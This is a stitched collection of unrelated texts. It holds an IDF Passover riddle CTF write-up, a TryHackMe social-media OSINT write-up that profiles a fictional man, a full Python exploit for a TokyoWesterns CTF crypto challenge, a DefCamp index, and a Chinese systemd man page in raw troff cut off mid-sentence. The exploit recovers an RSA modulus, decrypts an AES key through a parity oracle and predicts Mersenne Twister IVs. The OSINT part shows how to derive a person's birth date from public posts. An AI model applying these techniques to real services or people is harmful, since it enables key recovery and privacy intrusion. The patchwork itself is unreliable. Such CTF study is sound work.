<h2>Part One</h2>
<h3>Description</h3>
<p>
"We asked the best minds of Aman to challenge us with a complex riddle in honor of Passover. Passed all the stages? Got the information and managed to solve it? Then you probably already know which e-mail address to send us the answer to... IDF website team | 25.03.2021"
</p>
<pre dir="ltr" style="text-align: left">
If He had brought us out from Egypt, and had not carried out judgments against them
!Dayenu, it would have sufficed us-

If he had carried out judgments against them, and not against their idols
!Dayenu, it would have sufficed us-

If he had destroyed their idols, and had not smitten their first-born
!Dayenu, it would have sufliced us-

If he had smitten their first-born, and hed not given us their wealth
!Dayenu, it would have sufficed us-

If he had given us their wealth, and had not split the tea for us
!Dayemu, it would have sufficed us-

If he had split the sea for us, and had not taken us throuyh it on dry land
!Dayenu, it would have sufficed us-

If he hap taken us through the sea on dry lend, and had not drowned our opprossors in it
!Dayenu, it would have sufficed us-

If he had drowned our oppressors in it, and had not supplied our needs in the desert for forty years
!Dayenu, it would have sufficed us-

If he had supplied our needs in the desert for forty pears, and had not led us the manna
!Dayenu, it would have sufficed us-

If he had fed us the manna, and had not given us the Shebbat
!Dayenu, it would have sufficed us-

If he had given us the Shabbat, and had not brought us before Mount Sinai
!Dayenu, it would have sufficed us-

If he had brought us before Mount Sinai, and had not given us the Torah
!Dayenu, it would gave sufficed us-

If he had given us the Torah, and had not brought us into the land of Israel
!Dayenu, it would have sufficed us-

If he had not brought us into the land of Israel, and had not built for us the Beit Habechiroh (Chosen House; the Beit Hamikdash)
!Dayenu, it would have sufficed us-

Who said + __________? = www.idf.il/_____/י/
</pre>
<p>
*Note: copy the link from here after entering the answer. The answer is in Hebrew.
</p>
<h3>Solution</h3>
<p>
It is easy to recognize the Passover song "Dayenu" translated into English, but a more careful reading reveals several small changes in the song:
</p>
<ul dir="ltr">
<li>If he had given us their wealth, and had not split the <span style="color: red">t</span>ea for us</li>
<li>If he had supplied our needs in the desert for forty <span style="color: red">p</span>ears, and had not led us the manna</li>
</ul>
<p>
We can take the original text from <a href="https://en.wikipedia.org/wiki/Dayenu">Wikipedia</a> and compare.
</p>
<p>
We make a few small adjustments to the text taken from Wikipedia to ease the comparison. In the "Dayenu" line, change "He" to "he", and also convert the exclamation mark at the end of the sentence to "us-" to match the formatting Aman chose. These changes are not required, but they make the meaningful differences easier to spot.
</p>
<p>
Compare and get:
</p>

![](images/diff.png)

<p>
We can obtain the differences with the following command:
</p>
<pre style="text-align: left" dir="ltr">
root@kali:/media/sf_CTFs/aman/1# cmp -l their.txt original.txt | gawk '{printf "%c", strtonum(0$2)}' && echo
cmp: EOF on original.txt after byte 1619
letmypeoplegnot brought us intothe land of Israel,andhad not built for us th Beit Habechiroh (Chosen House; the Beit Ham
</pre>
<p>
The last line differs substantially, which "dirties" the comparison, but before that the phrase "letmypeoplego" is clearly visible — in Hebrew, "שלח את עמי".
</p>
<p>
The phrase was said by Moses. We fill that name into the link and move on to the next stage:
</p>

`https://www.idf.il/%D7%9E%D7%A9%D7%94/%D7%99/`

<h2>Part Two</h2>
<h3>Description</h3>
<div>
"Some think the story of the Exodus from Egypt is a fantasy, but in the course of a good argument you can present the following fact and prove that it is no...
"בט.טזחובד, גא.____טו"
Nearby you will find a city that symbolizes a painful victory.
Know what this is about? You are probably sharp enough to know where to send the answer."
</div>
<h3>Solution</h3>
<p>
It seems very likely that this is some substitution cipher. After checking basic ciphers such as Atbash, notice that the riddle contains only the letters א through ט. It therefore makes sense to replace the letters with digits. The riddle also contains a blank that we must fill in ourselves; given the opening text, the natural completion is the word "אגדה" ("legend"), which fits the phrase "it is no..." as well as the context. (A short decoding sketch appears at the end of this write-up.)
</p>
<p>
So:
</p>

```
בט.טזחובד, גא.____טו --> בט.טזחובד, גא.אגדהטו --> 695431.13 ,426879.92
```

<p>
Reversing the order of the characters gives coordinates:
</p>

```
29.978624, 31.134596
```

Entering them into Google Maps, we see:

![](images/coords.png)

<p>
Adjacent to these coordinates lies the city of "6th of October", named after the date on which the Yom Kippur War began. This is the "painful victory" the challenge description refers to.
</p>
<h2>Part Three</h2>
<h3>Description</h3>
<p>
All that remains now is to find the e-mail address to which the answer should be sent.
</p>
<h3>Solution</h3>
<p>
This is the challenge banner on the IDF website:
</p>

![](images/aman.jpg)

<p>
At the bottom of the banner there is Morse code:
</p>

```
.... .. -.. .- .-.-.- .. -.. ..-. .-.-.- .- -- .- -. .--.-. --. -- .- .. .-.. .-.-.- -.-. --- --
```

Decoding the Morse code yields the e-mail address.

<h2>Links</h2>
<ul>
<li><a href="https://www.idf.il/129495/">The riddle on the IDF website</a></li>
<li><a href="https://www.ynet.co.il/news/article/SJQbUBqEO">Article on Ynet</a></li>
</ul>
</div>
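The Part Two decoding can be checked in a few lines of Python. One subtlety: Hebrew is displayed right-to-left, so the digit string that appears "reversed" on screen is already in the correct order in logical (memory) order — which is why mapping the letters directly yields the coordinates.

```python
# Sketch: map א..ט to the digits 1..9 and decode the Part Two clue.
digit = {ch: str(i + 1) for i, ch in enumerate("אבגדהוזחט")}

clue = "בט.טזחובד, גא.אגדהטו"  # the blank already filled with אגדה ("legend")
print("".join(digit.get(ch, ch) for ch in clue))
# -> 29.978624, 31.134596
```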
# Social Media Intelligence Gathering in Practice

This post is a study note on [TryHackMe: KaffeeSec-SoMeSINT](https://www.secjuice.com/try-hack-me-kaffeesec-somesint/). It provides a complete example of intelligence gathering, analysis, and forensics using social media data.

## Goals

> 1. Investigate and analyze the person of interest to uncover facts and information.
> 2. Learn to use OSINT tools and techniques such as Google Dorking, website archiving, social media information gathering/enumeration & Analysis.
> 3. Apply the skills that you have learned throughout this write-up while attempting CTFs and while addressing real-world investigations related to social media.

## Material

> You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman. After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally.

## Challenge tasks

### Task 1

> Who hired you, and who are you investigating?

- Employer: "H"
- Investigation target: "Thomas Straussman"
- Wife: "Francesca Hodgerint"

### Task 2

> In our initial investigation, we found that our target goes by the handle **"tstraussman"** on two different social media platforms, which will soon be revealed.

Searching for the keyword on Google shows that the investigation target (hereafter "the target") has accounts on Twitter and Reddit.

<img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518191317783.png" alt="image-20210518191317783" style="zoom: 67%;" />

Below is [the target's Twitter profile page](https://twitter.com/TStraussman). Note the display name, the account handle, and the location: together these three confirm we have the right target. The bio, the content of the tweets, and the browsing and like history help establish the target's interests and personality.

<img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518191625107.png" alt="image-20210518191625107" style="zoom: 67%;" />

Below is [the target's Reddit profile page](https://www.reddit.com/user/Tstraussman/comments/kh1pzg/big_thank_you/):

![image-20210518192307703](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518192307703.png)

#### Q1

> Q1: **What is Thomas's favorite holiday?**

From the target's Twitter bio, we can infer that his favorite holiday is Christmas.

![image-20210518192044840](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518192044840.png)

**A1: Christmas**

#### Q2

> Q2: **What is Thomas's birth date? (Format is MM-DD-YYYY)**

Nothing on his social media states the birthday directly, so we try other angles:

- Go through the target's tweets, likes, and replies
  - No direct information in the tweet content
  - The likes reveal [his wife's Twitter](https://twitter.com/FHodgelink)
  - Going through the wife's Twitter turns up no direct information
  - No direct information in the replies
- Gather information from the target's Reddit

We find a post by the target on Reddit from four months earlier mentioning his "30th" birthday, which suggests a birth year of 1991.

<img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518194205937.png" alt="image-20210518194205937" />

Hovering over the post's timestamp shows the exact time:

![image-20210518194623363](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518194623363.png)

The post was published on December 21, 2020. This overturns the direct 1991 guess: counting completed years, the target's birthday would be 12-21-1990.

But note in particular that Reddit displayed that time in China Standard Time; we should adjust it to the target's local time.

The target is in Nuuk, Greenland, which uses Western Greenland Summer Time (WGST), 10 hours behind Beijing time. The post's publication time is therefore `12-20-2020, 18:32:57` WGST, and counting completed years, his birthday is `12-20-1990` in local time. (See the short conversion sketch at the end of this page.)

This date also matches the Reddit cake day:

![image-20210518200508271](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518200508271.png)

**A2: 12-20-1990 WGST**

#### Q3

> **What is Thomas' fiancée's Twitter handle?**

Already found while answering Q2.

**A3: Francesca Hodgelink, @FHodgelink, [Twitter Link](https://twitter.com/FHodgelink)**

#### Q4

> **What is Thomas' background picture of?**

Combining the Twitter bio with the style of the image, the answer is the Buddha.

**A4: Buddha**

### Task 3

// TODO
# Python 2 exploit script for a TokyoWesterns CTF crypto service
# (depends on gmpy2, PyCrypto, crypto-commons, and an MT19937 state-recovery helper).
import gmpy2
import re
from Crypto.Cipher import AES
from MTRecover import MT19937Recover
from crypto_commons.generic import factor, long_to_bytes, chunk, bytes_to_long
from crypto_commons.netcat.netcat_commons import nc, receive_until_match, send
from crypto_commons.oracle.lsb_oracle import lsb_oracle_from_bits


def unpad(s):
    n = ord(s[-1])
    return s[:-n]


def aes_decrypt(s, aeskey):
    iv = s[:16]
    aes = AES.new(aeskey, AES.MODE_CBC, iv)
    return unpad(aes.decrypt(s[16:]))


def lsb_oracle(encrypted_data, multiplicator, upper_bound, oracle_fun):
    def bits_provider():
        ciphertext = encrypted_data
        for i in range(895):  # 1024 - 128 = 896
            ciphertext = multiplicator(ciphertext)
            yield 0
        while True:
            ciphertext = multiplicator(ciphertext)
            yield oracle_fun(ciphertext)

    return lsb_oracle_from_bits(upper_bound, bits_provider())


def oracle(s, ct):
    # Submit a ciphertext and read back the least significant bit of the decryption.
    send(s, '2')
    print(receive_until_match(s, 'input hexencoded cipher text: '))
    payload = long_to_bytes(ct).encode("hex")
    print("Sending payload", payload)
    send(s, payload)
    r = receive_until_match(s, 'RSA: .*\n')
    receive_until_match(s, '4: get encrypted key\n')
    bit = int(re.findall('RSA: (.*)\n', r)[0], 16) & 1
    return bit


def recover_aes_key(n, s):
    # Decrypt the RSA-encrypted AES key with a classic LSB (parity) oracle.
    send(s, '4')
    r = receive_until_match(s, "here is encrypted key :\)\n.+\n")
    encrypted_aes_key = re.findall("here is encrypted key :\)\n(.*)\n", r)[0]
    print('aes key', encrypted_aes_key)
    decrypted_aes_key = lsb_oracle(int(encrypted_aes_key, 16),
                                   lambda ct: ct * pow(2, 65537, n) % n,
                                   n,
                                   lambda ct: oracle(s, ct))
    decrypted_aes_key = long_to_bytes(int(decrypted_aes_key))
    return decrypted_aes_key


def recover_n(s):
    # Recover the RSA modulus from two known plaintexts: n divides gcd(2^e - E(2), 3^e - E(3)).
    send(s, '1')
    print(receive_until_match(s, "input plain text: "))
    send(s, '\2')
    r = receive_until_match(s, "4: get encrypted key\n")
    print(r)
    pow2e = int(re.findall('RSA: (.*)\n', r)[0], 16)
    send(s, '1')
    print(receive_until_match(s, "input plain text: "))
    send(s, '\3')
    r = receive_until_match(s, "4: get encrypted key\n")
    print(r)
    pow3e = int(re.findall('RSA: (.*)\n', r)[0], 16)
    n = gmpy2.gcd(2 ** 65537 - pow2e, 3 ** 65537 - pow3e)
    n = factor(n)[1]
    assert pow(2, 65537, n) == pow2e
    return n


def get_iv(s):
    send(s, '1')
    print(receive_until_match(s, "input plain text: "))
    send(s, 'A')
    r = receive_until_match(s, "4: get encrypted key\n")
    print(r)
    aes_iv = re.findall('AES: (.*)\n', r)[0][:32].decode("hex")
    return aes_iv


def collect_outputs(s):
    out = []
    for i in range(160):
        aes_iv = get_iv(s)
        out.extend(map(bytes_to_long, chunk(aes_iv, 4))[::-1])
    return out


def recover_next_iv(s):
    # The 16-byte IVs come straight from a Mersenne Twister;
    # recover its internal state and predict the next IV.
    outputs = collect_outputs(s)
    mtr = MT19937Recover()
    r2 = mtr.go(outputs)
    iv = long_to_bytes(r2.getrandbits(16 * 8))
    sanity = get_iv(s)
    assert sanity == iv
    return long_to_bytes(r2.getrandbits(16 * 8)).encode("hex")


def main():
    url = "crypto.chal.ctf.westerns.tokyo"
    port = 5643
    s = nc(url, port)
    print(receive_until_match(s, "4: get encrypted key"))
    n = recover_n(s)
    print('n', n)
    decrypted_aes_key = recover_aes_key(n, s)
    print('aes key', decrypted_aes_key.encode("hex"))
    next_iv_hex = recover_next_iv(s)
    print('next iv', next_iv_hex)
    send(s, '3')
    r = receive_until_match(s, "4: get encrypted key\n")
    flag_ct = re.findall("another bulldozer is coming!\n(.*)\n", r)[0][32:]
    print('encrypted flag', next_iv_hex + flag_ct)
    print(aes_decrypt((next_iv_hex + flag_ct).decode("hex"), decrypted_aes_key))
    s.close()


main()
# Writeup DefCamp CTF Finals 2015

![](./IMG_20151119_104301.jpg)

# Table of contents:

* [web 200](web200)
* [crypto 100 (Morse c'est)](crypto100)
* [crypto 300](crypto300)
* [crypto 400](crypto400)
* [reverse 200 (Time is not your friend)](re_200_time_is_not_your_friend)
* [reverse 300 (Try harder)](re_300_tryharder)

### ENG version

# Table of contents:

* [web 200](web200#eng-version)
* [crypto 100 (Morse c'est)](crypto100#eng-version)
* [crypto 300](crypto300#eng-version)
* [crypto 400](crypto400#eng-version)
* [reverse 200 (Time is not your friend)](re_200_time_is_not_your_friend#eng-version)
* [reverse 300 (Try harder)](re_300_tryharder#eng-version)
'\" t .TH "DAEMON" "7" "" "systemd 231" "daemon" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debian.org/507673 .\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" ----------------------------------------------------------------- .\" * set default formatting .\" ----------------------------------------------------------------- .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .\" ----------------------------------------------------------------- .\" * MAIN CONTENT STARTS HERE * .\" ----------------------------------------------------------------- .SH "NAME" daemon \- 编写与打包系统守护进程 .SH "描述" .PP "守护进程"的意思是在后台运行的服务进程, 常用于监督系统的运行或者提供某种功能。 在传统的 SysV Unix 系统上, 多个守护进程必须严格按照特定的顺序依次启动。 在"新型"的 \fBsystemd\fR(1) 系统上, 守护进程的启动顺序非常简单且非常强大。 本手册同时解说了上述两种不同的启动方案, 并特别推荐了应该包含在 systemd 系统中的守护进程。 .SS "传统的SysV守护进程" .PP 传统的SysV守护进程在启动的时候, 应该在初始化阶段执行下面的步骤: .sp .RS 4 .ie n \{\ \h'-04' 1.\h'+01'\c .\} .el \{\ .sp -1 .IP " 1." 4.2 .\} 关闭除 STDIN STDOUT STDERR 之外的所有文件描述符 .RE .sp .RS 4 .ie n \{\ \h'-04' 2.\h'+01'\c .\} .el \{\ .sp -1 .IP " 2." 4.2 .\} 重置所有信号处理器 .RE .sp .RS 4 .ie n \{\ \h'-04' 3.\h'+01'\c .\} .el \{\ .sp -1 .IP " 3." 4.2 .\} 重置所有信号掩码 .RE .sp .RS 4 .ie n \{\ \h'-04' 4.\h'+01'\c .\} .el \{\ .sp -1 .IP " 4." 4.2 .\} 清理环境变量(重置一部分,移除一部分) .RE .sp .RS 4 .ie n \{\ \h'-04' 5.\h'+01'\c .\} .el \{\ .sp -1 .IP " 5." 4.2 .\} 调用 \fBfork()\fR 创建一个后台进程 .RE .sp .RS 4 .ie n \{\ \h'-04' 6.\h'+01'\c .\} .el \{\ .sp -1 .IP " 6." 4.2 .\} 在子进程中调用 \fBsetsid()\fR 从终端脱离并创建一个独立的会话 .RE .sp .RS 4 .ie n \{\ \h'-04' 7.\h'+01'\c .\} .el \{\ .sp -1 .IP " 7." 4.2 .\} 在子进程中再一次调用 \fBfork()\fR 以确保守护进程永远无法获取任何终端。 .RE .sp .RS 4 .ie n \{\ \h'-04' 8.\h'+01'\c .\} .el \{\ .sp -1 .IP " 8." 4.2 .\} 第一个子进程主动退出, 只有第二个子进程(实际的守护进程)保持运行, 并且以 init(PID=1) 为父进程。 .RE .sp .RS 4 .ie n \{\ \h'-04' 9.\h'+01'\c .\} .el \{\ .sp -1 .IP " 9." 4.2 .\} 守护进程(第二个子进程)将 STDIN STDOUT STDERR 连接到 /dev/null 虚拟设备 .RE .sp .RS 4 .ie n \{\ \h'-04'10.\h'+01'\c .\} .el \{\ .sp -1 .IP "10." 4.2 .\} 守护进程将 umask 设为 0 .RE .sp .RS 4 .ie n \{\ \h'-04'11.\h'+01'\c .\} .el \{\ .sp -1 .IP "11." 4.2 .\} 守护进程将当前目录切换到根目录(/) .RE .sp .RS 4 .ie n \{\ \h'-04'12.\h'+01'\c .\} .el \{\ .sp -1 .IP "12." 4.2 .\} 守护进程将自身的PID记录到例如 /run/foobar\&.pid 这样的文件中 .RE .sp .RS 4 .ie n \{\ \h'-04'13.\h'+01'\c .\} .el \{\ .sp -1 .IP "13." 4.2 .\} 守护进程丢弃自己不需要的权限(如果可以) .RE .sp .RS 4 .ie n \{\ \h'-04'14.\h'+01'\c .\} .el \{\ .sp -1 .IP "14." 4.2 .\} 守护进程通知最初的父进程:初始化工作已完成 .RE .sp .RS 4 .ie n \{\ \h'-04'15.\h'+01'\c .\} .el \{\ .sp -1 .IP "15." 4.2 .\} 最初的父进程自身退出 .RE .PP 注意,这些步骤对于下文讲述的新型守护进程是不需要的, 除非为了刻意兼容传统的SysV系统。 .SS "新型守护进程" .PP Linux 系统上的新型守护进程更容易被监控也更容易实现。 .PP 守护进程无需实现前文所描述的复杂步骤, 即可直接在 systemd 提供的干净的上下文环境中运行: .PP 环境变量已经被清理、信号处理器与信号掩码已经被重置、没有遗留的文件描述符、守护进程自动在其专属的会话中执行、 标准输入(STDIN)已被连接到 /dev/null 虚拟设备(除非另有配置)、 标准输出(STDOUT)与标准错误(STDERR)已被连接到 \fBsystemd-journald.service\fR(8) 日志服务(除非另有配置)、umask 已经被重置 \&.\&.\&. 等等 .PP 新型守护进程只需要遵守如下要求: .sp .RS 4 .ie n \{\ \h'-04' 1.\h'+01'\c .\} .el \{\ .sp -1 .IP " 1." 4.2 .\} 收到 \fBSIGTERM\fR 信号后 关闭进程并确保干净的退出 .RE .sp .RS 4 .ie n \{\ \h'-04' 2.\h'+01'\c .\} .el \{\ .sp -1 .IP " 2." 4.2 .\} 收到 \fBSIGHUP\fR 信号后 重新加载配置文件(若需要) .RE .sp .RS 4 .ie n \{\ \h'-04' 3.\h'+01'\c .\} .el \{\ .sp -1 .IP " 3." 
4.2 .\} 主守护进程在退出时应该按照 \m[blue]\fBLSB recommendations for SysV init scripts\fR\m[]\&\s-2\u[1]\d\s+2 的要求返回恰当的退出码, 以便于 systemd 判断服务的退出状态。 .RE .sp .RS 4 .ie n \{\ \h'-04' 4.\h'+01'\c .\} .el \{\ .sp -1 .IP " 4." 4.2 .\} 若可行,在初始化的最后一步, 通过 D\-Bus 创建进程的控制接口, 并在 D\-Bus 上注册一个总线名称。 .RE .sp .RS 4 .ie n \{\ \h'-04' 5.\h'+01'\c .\} .el \{\ .sp -1 .IP " 5." 4.2 .\} 提供一个 \&.service 单元文件, 包含如何启动/停止/维护该服务的配置。 详见 \fBsystemd.service\fR(5) 手册。 .RE .sp .RS 4 .ie n \{\ \h'-04' 6.\h'+01'\c .\} .el \{\ .sp -1 .IP " 6." 4.2 .\} 尽可能依赖于 systemd 的资源控制与权限剥夺功能 (CPU与内存占用/文件访问等等), 而不要自己实现它们。 详见 \fBsystemd.exec\fR(5) 手册。 .RE .sp .RS 4 .ie n \{\ \h'-04' 7.\h'+01'\c .\} .el \{\ .sp -1 .IP " 7." 4.2 .\} 若使用了 D\-Bus , 则强烈推荐使用基于 D\-Bus 的启动机制。 这样做有许多好处: 守护进程可以按需延迟启动; 可以和依赖于它的进程并行启动(提升启动速度); 守护进程可以在失败时被自动重启 而不丢失D\-Bus总线上的请求(详见下文) .RE .sp .RS 4 .ie n \{\ \h'-04' 8.\h'+01'\c .\} .el \{\ .sp -1 .IP " 8." 4.2 .\} 若守护进程通过套接字提供服务, 则强烈推荐使用基于套接字的启动机制(详见下文)。 这样做有许多好处: 守护进程可以按需延迟启动; 可以和依赖于它的进程并行启动(提升启动速度); 对于无状态协议(例如 syslog, DNS), 守护进程可以在失败时被自动重启而不丢失套接字上的请求(详见下文) .RE .sp .RS 4 .ie n \{\ \h'-04' 9.\h'+01'\c .\} .el \{\ .sp -1 .IP " 9." 4.2 .\} 若可能,守护进程应该通过 \fBsd_notify\fR(3) 接口通知 systemd "启动已完成"或"状态已更新"这样的消息。 .RE .sp .RS 4 .ie n \{\ \h'-04'10.\h'+01'\c .\} .el \{\ .sp -1 .IP "10." 4.2 .\} 不要使用 \fBsyslog()\fR 记录日志, 只需简单的使用 \fBfprintf()\fR 向 STDERR 输出日志即可。 如果必须指明日志等级, 则可以在日志的 行首加上类似 "<4>" 这样的前缀即可(这里表示4级"WARNING")。 详见 \fBsd-daemon\fR(3) 与 \fBsystemd.exec\fR(5) 手册。 .RE .PP 上述要求与 \m[blue]\fBApple MacOS X Daemon Requirements\fR\m[]\&\s-2\u[2]\d\s+2 类似, 但并不完全相同。 .SH "启动" .PP systemd 提供了多种启动机制(见下文), 而服务单元也经常同时使用其中的几种。 例如 bluetoothd\&.service 可以在插入蓝牙硬件时被启动, 也可以在某进程访问其 D\-Bus 接口时被启动。 又如打印服务可以在IPP端口有流量接入时被启动, 也可以在插入打印机硬件时被启动, 还可以在有文件进入打印机 spool 目录时被启动。 甚至对于必须在系统启动时无条件启动的服务, 为了尽可能并发启动, 也应该使用某些启动机制。 如果某守护进程实现了一个 D\-Bus 服务或者监听一个套接字, 那么使用基于 D\-Bus 或基于套接字的启动机制, 将允许该进程与其客户端同时并行启动(从而加快启动速度)。 因为所有的通信渠道都已事先建立, 并且不会丢失任何客户端请求, 同时 D\-Bus 总线或者内核会将客户端请求排入队列等候, 直到完成启动。 .SS "系统启动时启动" .PP 传统的守护进程一般是在系统启动时通过SysV初始化脚本自动启动, systemd 也支持这种启动方式。 .PP 对于 systemd 来说, 如果希望确保某单元在系统启动时自动启动, 那么最佳的做法是在默认启动目标 (通常是 multi\-user\&.target 或 graphical\&.target)的 \&.wants/ 目录中为该单元建立软链接。 参见 \fBsystemd.unit\fR(5) 手册以了解 \&.wants/ 目录, 参见 \fBsystemd.special\fR(7) 手册以了解上述两个特殊的启动目标。 .SS "基于套接字的启动" .PP 为了尽可能提高并行性与健壮性, 以及简化配置与开发, 对于需要监听套接字的服务, 强烈推荐使用基于套接字的启动机制。 使用此机制后, 守护进程不再需要创建和绑定套接字, 而是由 systemd 接管这个工作。 systemd 将会根据单元文件的设置, 预先创建所需的套接字, 并在第一个客户端请求接入的时候启动该服务, 以实现服务的按需启动。 该机制的好处还在于, 预先创建好套接字之后, 所有使用此套接字通信的进程可以并行启动(包括客户端和服务端)。 此外,重启服务只会导致丢失最低限度的客户端连接, 甚至不丢失任何客户端请求 (例如对于 DNS 或 syslog 这样的无状态协议)。 因为套接字在服务重启期间始终保持有效并且可被访问, 同时所有客户端请求也都被排入队列等候处理。 .PP 使用此机制之后, 守护进程必须要从 systemd 接收已创建好的套接字, 而不能自己创建并绑定套接字。 关于如何使用该机制,参见 \fBsd_listen_fds\fR(3) 与 \fBsd-daemon\fR(3) 手册。 只需要小小的修改, 即可在原有启动机制的基础上添加基于套接字的启动机制, 至于如何移植,详见后文。 .PP systemd 通过 \&.socket 单元实现该机制,详见 \fBsystemd.socket\fR(5) 手册。 必须确保所有为支持基于套接字启动而创建的监听 socket 单元都被包含在 sockets\&.target 中。 建议在 socket 单元的 "[Install]" 小节加入 \fIWantedBy=sockets\&.target\fR 设置, 以确保在启用该单元时能够自动添加上述依赖关系。 除非明确设置了 \fIDefaultDependencies=no\fR , 否则会为所有 socket 单元隐含的创建必要的顺序依赖。 有关 sockets\&.target 的解释,详见 \fBsystemd.special\fR(7) 手册。 如果某 socket 单元已被包含在 sockets\&.target 中, 那么不建议在其中再添加任何额外的依赖关系(例如 multi\-user\&.target 之类)。 .SS "基于 D\-Bus 的启动" .PP 如果守护进程使用 D\-Bus 与客户端通信, 那么它应该使用基于 D\-Bus 的启动机制, 这样当客户端访问其 D\-Bus 接口时, 该服务将被自动启动。 该机制是通过 D\-Bus service 文件实现的(不要与普通的单元文件混淆)。 为了确保让 D\-Bus 使用 systemd 来启动与维护守护进程, 必须在这些 D\-Bus service 文件中使用 \fISystemdService=\fR 指明其匹配的服务单元。 例如,对于文件名为 org\&.freedesktop\&.RealtimeKit\&.service 的 D\-Bus service 来说, 为了将其绑定到 rtkit\-daemon\&.service 服务单元, 必须确保在该文件中设置了 
\fISystemdService=rtkit\-daemon\&.service\fR 指令。 注意,必须明确设置 \fISystemdService=\fR 指令, 否则当服务单元同时使用多种启动机制时, 可能会导致竞争条件的出现。 .SS "基于设备的启动" .PP 用于管理特定类型硬件的守护进程, 只应该在符合条件的硬件变为可用或者被插入时,才需要启动。 为了达到上述目的, 可以将服务的启动/停止与硬件的插入/拔出事件绑定。 当带有 "systemd" 标签的设备出现在 sysfs/udev 设备树中时, systemd 将会自动为其创建对应的 device 单元。 通过向这些单元中添加对其他单元的 \fIWants=\fR 依赖, 就可以实现当该 device 单元被启动(也就是硬件被插入)时, 连带启动其他单元,从而实现基于设备的启动。 这可以通过向 udev 规则库中添加 \fISYSTEMD_WANTS=\fR 属性来实现, 详见 \fBsystemd.device\fR(5) 手册。 通常,并不是将 service 单元直接添加到设备的 \fIWants=\fR 依赖中, 而是通过专用的 target 单元间接添加。 例如,不是将 bluetoothd\&.service 添加到各种蓝牙设备的 \fIWants=\fR 依赖中, 而是将 bluetoothd\&.service 添加到 bluetooth\&.target 的 \fIWants=\fR 依赖中, 同时再将 bluetooth\&.target 添加到各种蓝牙设备的 \fIWants=\fR 依赖中。 通过引入 bluetooth\&.target 这个抽象层, 系统管理员无需批量修改 udev 规则库, 仅通过 \fBsystemctl enable|disable \&.\&.\&.\fR 命令 修改 bluetooth\&.target\&.wants/ 目录中的软链接, 即可控制 bluetoothd\&.service 的使用。 .SS "基于路径的启动" .PP 对于处理 spool 文件或目录的守护进程(例如打印服务)来说, 仅在 spool 文件或目录状态发生变化或者内容非空时, 才需要启动。 通过 \&.path 单元实现的、 基于路径的启动机制正好适用于这种场合, 详见 \fBsystemd.path\fR(5) 手册。 .SS "基于定时器的启动" .PP 对于周期性的操作(例如垃圾文件清理或者网络对时), 可以通过基于定时器的启动机制来实现。 这种机制通过 \&.timer 单元实现,详见 \fBsystemd.timer\fR(5) 手册。 .SS "其他启动方式" .PP 在其他操作系统上还存在着其他的启动机制, 不过这些机制都可以被前述的各种机制的组合替代。 因此在这里不再赘述。 .SH "与 SYSTEMD 整合" .SS "编写 systemd 单元文件" .PP 在编写单元文件时应当考虑下列建议: .sp .RS 4 .ie n \{\ \h'-04' 1.\h'+01'\c .\} .el \{\ .sp -1 .IP " 1." 4.2 .\} 尽可能不用 \fIType=forking\fR 。 若非用不可,则必须正确设置 \fIPIDFile=\fR 指令。参见 \fBsystemd.service\fR(5) 手册。 .RE .sp .RS 4 .ie n \{\ \h'-04' 2.\h'+01'\c .\} .el \{\ .sp -1 .IP " 2." 4.2 .\} 若守护进程在 D\-Bus 上注册了一个名字, 则应尽可能使用 \fIType=dbus\fR .RE .sp .RS 4 .ie n \{\ \h'-04' 3.\h'+01'\c .\} .el \{\ .sp -1 .IP " 3." 4.2 .\} 设置一个易于理解的 \fIDescription=\fR .RE .sp .RS 4 .ie n \{\ \h'-04' 4.\h'+01'\c .\} .el \{\ .sp -1 .IP " 4." 4.2 .\} 确保 \fIDefaultDependencies=yes\fR , 除非该单元必须在系统启动的早期启动或者必须在系统关闭的末期关闭。 .RE .sp .RS 4 .ie n \{\ \h'-04' 5.\h'+01'\c .\} .el \{\ .sp -1 .IP " 5." 4.2 .\} 通常无需显式定义依赖关系。 不过,如果确实需要显式定义依赖关系, 为了确保单元文件不局限于特定的发行版,仅应该依赖于 \fBsystemd.special\fR(7) 中列出的单元以及自身所属软件包中提供的单元。 .RE .sp .RS 4 .ie n \{\ \h'-04' 6.\h'+01'\c .\} .el \{\ .sp -1 .IP " 6." 4.2 .\} 确保在 "[Install]" 小节中包含完整的启用信息(参见 \fBsystemd.unit\fR(5) 手册)。 若希望自动启动该单元, 则应该设置 \fIWantedBy=multi\-user\&.target\fR 或 \fIWantedBy=graphical\&.target\fR 若希望自动启动该单元的套接字,则应该设置 \fIWantedBy=sockets\&.target\fR 。 通常你还希望在启用该单元时, 一起启用对应的套接字单元(假定为 foo\&.service), 因此还应该设置 \fIAlso=foo\&.socket\fR .RE .SS "安装 service 单元文件" .PP 当从源代码编译安装(\fBmake install\fR)软件包时, 其中的系统服务单元文件会被默认安装到 \fBpkg\-config systemd \-\-variable=systemdsystemunitdir\fR 命令返回的目录中(通常是 /usr/lib/systemd/system); 而其中的用户服务单元文件会被默认安装到 \fBpkg\-config systemd \-\-variable=systemduserunitdir\fR 命令返回的目录中(通常是 /usr/lib/systemd/user); 但并不应该使用 \fBsystemctl enable \&.\&.\&.\fR 命令启用它们。 当从包管理器安装(\fBrpm \-i\fR)二进制软件包时, 其中的单元文件应该同样安装到上述位置。 但不同之处在于, 还应该使用 \fBsystemctl enable 